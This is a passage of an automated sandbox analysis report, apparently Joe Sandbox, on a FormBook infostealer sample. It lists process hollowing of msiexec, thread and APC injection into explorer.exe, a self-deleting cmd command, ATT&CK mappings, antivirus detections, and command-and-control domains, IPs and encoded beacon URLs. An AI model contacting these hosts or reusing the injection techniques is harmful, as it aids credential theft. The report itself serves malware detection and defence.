Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_043DAE73 mov eax, dword ptr fs:[00000030h]	10_2_043DAE73
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_043DAE73 mov eax, dword ptr fs:[00000030h]	10_2_043DAE73
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_043C766D mov eax, dword ptr fs:[00000030h]	10_2_043C766D
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_0446FE3F mov eax, dword ptr fs:[00000030h]	10_2_0446FE3F
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_043B9240 mov eax, dword ptr fs:[00000030h]	10_2_043B9240
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_043B9240 mov eax, dword ptr fs:[00000030h]	10_2_043B9240
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_043B9240 mov eax, dword ptr fs:[00000030h]	10_2_043B9240
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_043B9240 mov eax, dword ptr fs:[00000030h]	10_2_043B9240
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_043C7E41 mov eax, dword ptr fs:[00000030h]	10_2_043C7E41
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_043C7E41 mov eax, dword ptr fs:[00000030h]	10_2_043C7E41
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_043C7E41 mov eax, dword ptr fs:[00000030h]	10_2_043C7E41
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_043C7E41 mov eax, dword ptr fs:[00000030h]	10_2_043C7E41
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_043C7E41 mov eax, dword ptr fs:[00000030h]	10_2_043C7E41
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_043C7E41 mov eax, dword ptr fs:[00000030h]	10_2_043C7E41
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_0446FEC0 mov eax, dword ptr fs:[00000030h]	10_2_0446FEC0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_043CAAB0 mov eax, dword ptr fs:[00000030h]	10_2_043CAAB0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_043CAAB0 mov eax, dword ptr fs:[00000030h]	10_2_043CAAB0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_043EFAB0 mov eax, dword ptr fs:[00000030h]	10_2_043EFAB0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_043B52A5 mov eax, dword ptr fs:[00000030h]	10_2_043B52A5
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_043B52A5 mov eax, dword ptr fs:[00000030h]	10_2_043B52A5
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_043B52A5 mov eax, dword ptr fs:[00000030h]	10_2_043B52A5
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_043B52A5 mov eax, dword ptr fs:[00000030h]	10_2_043B52A5
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_043B52A5 mov eax, dword ptr fs:[00000030h]	10_2_043B52A5
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_04488ED6 mov eax, dword ptr fs:[00000030h]	10_2_04488ED6
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_043ED294 mov eax, dword ptr fs:[00000030h]	10_2_043ED294
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_043ED294 mov eax, dword ptr fs:[00000030h]	10_2_043ED294
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_0444FE87 mov eax, dword ptr fs:[00000030h]	10_2_0444FE87
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_043E16E0 mov ecx, dword ptr fs:[00000030h]	10_2_043E16E0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_043C76E2 mov eax, dword ptr fs:[00000030h]	10_2_043C76E2
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_044346A7 mov eax, dword ptr fs:[00000030h]	10_2_044346A7
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_04480EA5 mov eax, dword ptr fs:[00000030h]	10_2_04480EA5
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_04480EA5 mov eax, dword ptr fs:[00000030h]	10_2_04480EA5
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_04480EA5 mov eax, dword ptr fs:[00000030h]	10_2_04480EA5
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_043E36CC mov eax, dword ptr fs:[00000030h]	10_2_043E36CC
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_043F8EC7 mov eax, dword ptr fs:[00000030h]	10_2_043F8EC7
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_043EE730 mov eax, dword ptr fs:[00000030h]	10_2_043EE730
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_04488B58 mov eax, dword ptr fs:[00000030h]	10_2_04488B58
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_043B4F2E mov eax, dword ptr fs:[00000030h]	10_2_043B4F2E
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_043B4F2E mov eax, dword ptr fs:[00000030h]	10_2_043B4F2E
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_04488F6A mov eax, dword ptr fs:[00000030h]	10_2_04488F6A
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_043E3B7A mov eax, dword ptr fs:[00000030h]	10_2_043E3B7A
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_043E3B7A mov eax, dword ptr fs:[00000030h]	10_2_043E3B7A
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_0448070D mov eax, dword ptr fs:[00000030h]	10_2_0448070D
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_0448070D mov eax, dword ptr fs:[00000030h]	10_2_0448070D
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_0444FF10 mov eax, dword ptr fs:[00000030h]	10_2_0444FF10
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_0444FF10 mov eax, dword ptr fs:[00000030h]	10_2_0444FF10
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_043BDB60 mov ecx, dword ptr fs:[00000030h]	10_2_043BDB60
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_0447131B mov eax, dword ptr fs:[00000030h]	10_2_0447131B
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_043CFF60 mov eax, dword ptr fs:[00000030h]	10_2_043CFF60
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_043BF358 mov eax, dword ptr fs:[00000030h]	10_2_043BF358
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_043BDB40 mov eax, dword ptr fs:[00000030h]	10_2_043BDB40
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_043CEF40 mov eax, dword ptr fs:[00000030h]	10_2_043CEF40
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_043EB390 mov eax, dword ptr fs:[00000030h]	10_2_043EB390
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_043C1B8F mov eax, dword ptr fs:[00000030h]	10_2_043C1B8F
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_043C1B8F mov eax, dword ptr fs:[00000030h]	10_2_043C1B8F
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_0446D380 mov ecx, dword ptr fs:[00000030h]	10_2_0446D380
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_0447138A mov eax, dword ptr fs:[00000030h]	10_2_0447138A
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_04437794 mov eax, dword ptr fs:[00000030h]	10_2_04437794
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_04437794 mov eax, dword ptr fs:[00000030h]	10_2_04437794
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_04437794 mov eax, dword ptr fs:[00000030h]	10_2_04437794
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_04485BA5 mov eax, dword ptr fs:[00000030h]	10_2_04485BA5

Source: C:\Users\user\Desktop\wREFu91LXZ.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process token adjusted: Debug			Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Domain query: www.surivaganza.com
Source: C:\Windows\explorer.exe	Network Connect: 52.5.43.61 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.oikoschain.com
Source: C:\Windows\explorer.exe	Domain query: www.matcitekids.com
Source: C:\Windows\explorer.exe	Network Connect: 50.87.248.20 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.chaneabond.com
Source: C:\Windows\explorer.exe	Domain query: www.extinctionbrews.com
Source: C:\Windows\explorer.exe	Domain query: www.monsoonnerd.com
Source: C:\Windows\explorer.exe	Network Connect: 198.185.159.144 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 217.160.0.254 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 50.87.238.189 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.melodezu.com
Source: C:\Windows\explorer.exe	Domain query: www.tinsley.website
Source: C:\Windows\explorer.exe	Network Connect: 64.227.87.162 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.mydreamtv.net
Source: C:\Windows\explorer.exe	Domain query: www.cajunseafoodstcloud.com

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\wREFu91LXZ.exe	Section loaded: unknown target: C:\Users\user\Desktop\wREFu91LXZ.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\wREFu91LXZ.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\wREFu91LXZ.exe	Section loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\wREFu91LXZ.exe	Section loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\wREFu91LXZ.exe	Thread register set: target process: 3388			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread register set: target process: 3388			Jump to behavior

Queues an APC in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\wREFu91LXZ.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Show sources

Source: C:\Users\user\Desktop\wREFu91LXZ.exe

Section unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 80000

Jump to behavior

Source: C:\Users\user\Desktop\wREFu91LXZ.exe	Process created: C:\Users\user\Desktop\wREFu91LXZ.exe 'C:\Users\user\Desktop\wREFu91LXZ.exe'			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\wREFu91LXZ.exe'			Jump to behavior

Source: explorer.exe, 00000005.00000000.232284109.0000000001398000.00000004.00000020.sdmp	Binary or memory string: ProgmanamF
Source: explorer.exe, 00000005.00000000.261365308.0000000001980000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000005.00000000.247668679.000000000871F000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000005.00000000.261365308.0000000001980000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000005.00000000.261365308.0000000001980000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 3.1.wREFu91LXZ.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.wREFu91LXZ.exe.21a0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.wREFu91LXZ.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.1.wREFu91LXZ.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.wREFu91LXZ.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.wREFu91LXZ.exe.21a0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.230049818.00000000021A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.273287950.0000000006399000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.486466512.0000000000430000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.487707401.0000000004060000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.487516890.0000000002A10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.283872070.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.284026050.0000000000540000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000001.227451103.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.284250937.00000000009D0000.00000040.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 3.1.wREFu91LXZ.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.wREFu91LXZ.exe.21a0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.wREFu91LXZ.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.1.wREFu91LXZ.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.wREFu91LXZ.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.wREFu91LXZ.exe.21a0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.230049818.00000000021A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.273287950.0000000006399000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.486466512.0000000000430000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.487707401.0000000004060000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.487516890.0000000002A10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.283872070.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.284026050.0000000000540000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000001.227451103.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.284250937.00000000009D0000.00000040.00000001.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Shared Modules1	DLL Side-Loading1	Process Injection512	Virtualization/Sandbox Evasion2	OS Credential Dumping	Security Software Discovery121	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	DLL Side-Loading1	Process Injection512	LSASS Memory	Virtualization/Sandbox Evasion2	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer3	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information2	Security Account Manager	Process Discovery2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Software Packing11	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol13	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	DLL Side-Loading1	LSA Secrets	System Information Discovery11	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
wREFu91LXZ.exe	32%	Virustotal		Browse
wREFu91LXZ.exe	54%	ReversingLabs	Win32.Trojan.VirRansom
wREFu91LXZ.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
10.2.msiexec.exe.48c7960.5.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
10.2.msiexec.exe.22b358.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
1.2.wREFu91LXZ.exe.21a0000.2.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
3.2.wREFu91LXZ.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
3.1.wREFu91LXZ.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
1.2.wREFu91LXZ.exe.680000.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://www.cajunseafoodstcloud.com/dy8g/?9rrLUp1=sC7FhjJqcCFIEoUuEobIBnrRYwOZzG9nc/x6jFk5Keq5TgsKgOpKFfaz6JoBJPzzv7cu&sxlxj=RL30W	0%	Avira URL Cloud	safe
http://www.tinsley.website/dy8g/?9rrLUp1=iVPDfBhYBy5JvywJlu7/jTaNaIK/WCHUrbFXeojMH/nMVdHPbpxjQuq5aGN6jhO1pTuT&sxlxj=RL30W	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.matcitekids.com/dy8g/?9rrLUp1=dI9eO6GEnVuhhF2IZBGZI9CJMc/scmM0Fs5NmUifzPq1VUdHCmcaYQjC6cJJVTF2eMwa&sxlxj=RL30W	0%	Avira URL Cloud	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
www.extinctionbrews.com/dy8g/	0%	Avira URL Cloud	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.extinctionbrews.com/dy8g/?9rrLUp1=DjnY/S7/G1yk/GGdjnbMG0pwlAlipgBY8a8MDSEvYTAaE8/8s3MkSQswoFjnAjbDmWUu&sxlxj=RL30W	0%	Avira URL Cloud	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.chaneabond.com/dy8g/?9rrLUp1=0Hs+m/QFKKZkFwACjLHyI7vfWqidr4y2jXRg5Hngc5JW+skIzqaHxis+6ShLP6A0B+d4&sxlxj=RL30W	0%	Avira URL Cloud	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.melodezu.com/dy8g/?9rrLUp1=qBaU/+yfeYHlIZouGPofXU4iidVfFInHYvrLlGgOmZTTl18u/I/MgAYEWpA7pfREgQYT&sxlxj=RL30W	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
matcitekids.com	50.87.248.20	true	true	unknown
extinctionbrews.com	34.102.136.180	true	false	unknown
www.surivaganza.com	217.160.0.254	true	true	unknown
tinsley.website	50.87.238.189	true	true	unknown
cajunseafoodstcloud.com	52.5.43.61	true	true	unknown
ext-sq.squarespace.com	198.185.159.144	true	false	high
melodezu.com	64.227.87.162	true	true	unknown
wthcoffee.com	184.168.131.241	true	true	unknown
www.wthcoffee.com	unknown	unknown	true	unknown
www.avito-payment.life	unknown	unknown	true	unknown
www.oikoschain.com	unknown	unknown	true	unknown
www.melodezu.com	unknown	unknown	true	unknown
www.tinsley.website	unknown	unknown	true	unknown
www.matcitekids.com	unknown	unknown	true	unknown
www.mydreamtv.net	unknown	unknown	true	unknown
www.chaneabond.com	unknown	unknown	true	unknown
www.extinctionbrews.com	unknown	unknown	true	unknown
www.monsoonnerd.com	unknown	unknown	true	unknown
www.cajunseafoodstcloud.com	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.cajunseafoodstcloud.com/dy8g/?9rrLUp1=sC7FhjJqcCFIEoUuEobIBnrRYwOZzG9nc/x6jFk5Keq5TgsKgOpKFfaz6JoBJPzzv7cu&sxlxj=RL30W	true	Avira URL Cloud: safe	unknown
http://www.tinsley.website/dy8g/?9rrLUp1=iVPDfBhYBy5JvywJlu7/jTaNaIK/WCHUrbFXeojMH/nMVdHPbpxjQuq5aGN6jhO1pTuT&sxlxj=RL30W	true	Avira URL Cloud: safe	unknown
http://www.matcitekids.com/dy8g/?9rrLUp1=dI9eO6GEnVuhhF2IZBGZI9CJMc/scmM0Fs5NmUifzPq1VUdHCmcaYQjC6cJJVTF2eMwa&sxlxj=RL30W	true	Avira URL Cloud: safe	unknown
www.extinctionbrews.com/dy8g/	true	Avira URL Cloud: safe	low
http://www.extinctionbrews.com/dy8g/?9rrLUp1=DjnY/S7/G1yk/GGdjnbMG0pwlAlipgBY8a8MDSEvYTAaE8/8s3MkSQswoFjnAjbDmWUu&sxlxj=RL30W	false	Avira URL Cloud: safe	unknown
http://www.chaneabond.com/dy8g/?9rrLUp1=0Hs+m/QFKKZkFwACjLHyI7vfWqidr4y2jXRg5Hngc5JW+skIzqaHxis+6ShLP6A0B+d4&sxlxj=RL30W	true	Avira URL Cloud: safe	unknown
http://www.melodezu.com/dy8g/?9rrLUp1=qBaU/+yfeYHlIZouGPofXU4iidVfFInHYvrLlGgOmZTTl18u/I/MgAYEWpA7pfREgQYT&sxlxj=RL30W	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.apache.org/licenses/LICENSE-2.0	explorer.exe, 00000005.00000000.248948750.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com	explorer.exe, 00000005.00000000.248948750.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designersG	explorer.exe, 00000005.00000000.248948750.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designers/?	explorer.exe, 00000005.00000000.248948750.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/bThe	explorer.exe, 00000005.00000000.248948750.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers?	explorer.exe, 00000005.00000000.248948750.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.tiro.com	explorer.exe, 00000005.00000000.248948750.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers	explorer.exe, 00000005.00000000.248948750.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.goodfont.co.kr	explorer.exe, 00000005.00000000.248948750.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.carterandcone.coml	explorer.exe, 00000005.00000000.248948750.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.sajatypeworks.com	explorer.exe, 00000005.00000000.248948750.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.typography.netD	explorer.exe, 00000005.00000000.248948750.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	explorer.exe, 00000005.00000000.248948750.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/cThe	explorer.exe, 00000005.00000000.248948750.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	explorer.exe, 00000005.00000000.248948750.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://fontfabrik.com	explorer.exe, 00000005.00000000.248948750.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.cn/cn	explorer.exe, 00000005.00000000.248948750.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-jones.html	explorer.exe, 00000005.00000000.248948750.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.jiyu-kobo.co.jp/	explorer.exe, 00000005.00000000.248948750.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/DPlease	explorer.exe, 00000005.00000000.248948750.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers8	explorer.exe, 00000005.00000000.248948750.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.fonts.com	explorer.exe, 00000005.00000000.248948750.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.sandoll.co.kr	explorer.exe, 00000005.00000000.248948750.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.urwpp.deDPlease	explorer.exe, 00000005.00000000.248948750.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	explorer.exe, 00000005.00000000.248948750.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.sakkal.com	explorer.exe, 00000005.00000000.248948750.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
